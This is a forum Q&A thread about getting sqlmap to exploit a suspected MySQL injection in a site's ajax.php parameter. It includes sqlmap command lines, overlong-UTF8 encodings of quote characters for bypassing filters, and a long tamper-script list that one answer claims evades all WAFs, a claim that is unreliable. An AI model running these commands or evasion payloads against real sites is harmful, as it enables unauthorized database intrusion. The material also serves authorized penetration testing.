# Special sqlmap injection

Tags: php, sql-injection, mysql, sqlmap

I'm currently pentesting my friends website. I found an SQL injection with acunetix' help:

```
- URL encoded GET input for was set to 1#####
Error message found: 
supplied argument is not a valid MySQL result
```

So I tried running a normal sqlmap:

```
./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25
```

Output:

> [11:16:31] [WARNING] URI parameter '#1*' is not injectable [11:16:31]
>   [CRITICAL] all tested parameters appear to be not injectable. Try to
>   increase '--level'/'--risk' values to perform more tests. Also, you
>   can try to rerun by providing either a valid value for option
>   '--string' (or '--regexp'). If you suspect that there is some kind of
>   protection mechanism involved (e.g. WAF) maybe you could retry with an
>   option '--tamper' (e.g. '--tamper=space2comment')

So I need a way to include those #'s `(for=1%00%c0%a7%c0%a2)`
Tried `--string` and `--suffix` but didn't do the job. Maybe there's a tamper for this?

Comment: I don't understand how you know this is vulnerable to SQL injection, have you tested it manually? In my experience, it is better to do it manually to rely on a tool completely. Could you give more information about vulnerable parameter to determine what sqlmap options are appropiated for this?

Answer (score 1):

These characters are Overlong-UTF8:
' = %27 = %c0%a7 = %e0%80%a7 = %f0%80%80%a7
" = %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2
< = %3c = %c0%bc = %e0%80%bc = %f0%80%80%bc
; = %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb
& = %26 = %c0%a6 = %e0%80%a6 = %f0%80%80%a6
\0= % 00 = %c0%80 = %e0%80%80 = %f0%80%80%80

If you are using SQLMAP you can use --tamper=overlongutf8 to exploit the vulnerability.

Answer (score 1):

There is one more way that you can use all of tampers in one line like so:

```
./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```

By using this, you can pass over all of WAFs.